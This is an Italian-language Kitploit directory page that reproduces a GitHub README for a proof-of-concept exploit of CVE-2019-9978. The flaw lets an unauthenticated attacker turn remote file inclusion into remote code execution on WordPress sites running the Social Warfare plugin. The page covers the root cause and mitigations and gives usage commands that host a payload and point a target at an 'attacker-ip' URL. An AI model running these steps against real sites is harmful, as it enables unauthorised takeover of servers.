Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-9978-RCE-PoC — Un proof-of-concept Python personalizzato che mostra l'analisi delle cause profonde e lo sfruttamento di CVE 2019-9978 (plugin Social Warfare), concentrandosi sul flusso pratico dell'attacco RFI verso RCE. | Kitploit
Strumenti/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Un proof-of-concept Python personalizzato che mostra l'analisi delle cause profonde e lo sfruttamento di CVE 2019-9978 (plugin Social Warfare), concentrandosi sul flusso pratico dell'attacco RFI verso RCE.

Vedi Repository
128 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-9978 RCE PoC – Exploit del Plugin Social Warfare per WordPress

Inclusione Remota di File (RFI) non autenticata verso Esecuzione Remota di Codice (RCE)


📌 Descrizione

Questo repository contiene un Proof of Concept (PoC) basato su Python che dimostra lo sfruttamento di CVE-2019-9978, una vulnerabilità critica nel plugin Social Warfare per WordPress.

La vulnerabilità consente a un attaccante non autenticato di effettuare Remote File Inclusion (RFI), che può essere elevata a Remote Code Execution (RCE) ospitando un payload malevolo su un server controllato dall'attaccante.

Questo PoC è stato sviluppato e testato in un ambiente di laboratorio WordPress controllato esclusivamente a scopo educativo e di test di sicurezza autorizzati.


🔍 Riepilogo della Vulnerabilità

  • ID CVE: CVE-2019-9978
  • Componente Affetto: Social Warfare (Plugin WordPress)
  • Versioni Affette: ≤ 3.5.2
  • Tipo di Vulnerabilità: Remote File Inclusion (RFI)
  • Impatto: Remote Code Execution (RCE)
  • Autenticazione Richiesta: No
  • Vettore di Attacco: Remoto
  • Gravità: Critica

  • 🧠 Analisi della Causa Principale

    Il plugin Social Warfare non riesce a convalidare e sanificare correttamente l'input fornito dall'utente utilizzato per l'inclusione di contenuti remoti.
    Di conseguenza, un attaccante può fornire un URL esterno malevolo, portando a un'inclusione remota di file non autenticata.

    Quando il file remoto incluso contiene codice PHP eseguibile, viene eseguito nel contesto del server WordPress, risultando in esecuzione remota di codice.


    🔄 Flusso dell'Attacco

    root@kitploit:~
    
    Richiesta HTTP non autenticata
    ↓
    Remote File Inclusion (URL esterno)
    ↓
    Esecuzione del Payload Malevolo
    ↓
    Remote Code Execution (RCE)
    
    

    🧪 Proof of Concept (PoC)

    1. L'attaccante ospita un payload malevolo su un server HTTP esterno
    2. L'endpoint vulnerabile di Social Warfare include il file remoto
    3. Il payload viene eseguito sul server WordPress di destinazione
    4. L'attaccante ottiene l'esecuzione remota di comandi
    5. Lo script di exploit automatizza questo processo per scopi di test e ricerca

    ▶️ Utilizzo

    Passo 1: Ospitare il payload

    root@kitploit:~
    python3 -m http.server 8000
    

    Posizionare il file payload (es. payload-main.txt) nella directory del server.


    Passo 2: Eseguire l'exploit

    root@kitploit:~
    python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
    

    🛠 Requisiti

    • Python 3.x
    • Versione vulnerabile del plugin Social Warfare per WordPress
    • Ambiente di test WordPress
    • Server HTTP locale o remoto per l'hosting del payload

    🛡 Mitigazione e Difesa

    • Aggiornare il plugin Social Warfare a una versione patchata

    • Disabilitare l'inclusione remota di file:

      root@kitploit:~
      allow_url_include = Off
      
    • Limitare la gestione degli URL esterni nei plugin WordPress

    • Implementare un Web Application Firewall (WAF) con regole di rilevamento RFI


    ⚠️ Disclaimer Legale

    Questo progetto è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati.

    NON utilizzare questo Proof of Concept contro sistemi senza autorizzazione esplicita. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


    🔗 Riferimenti e Crediti

    • Ricercatore Originale: Luka Sikic
    • Riferimento PoC Originale: https://github.com/hash3liZer/CVE-2019-9978
    • Autore / Adattamento: Vaidehi Muluru

    Scarica lo strumento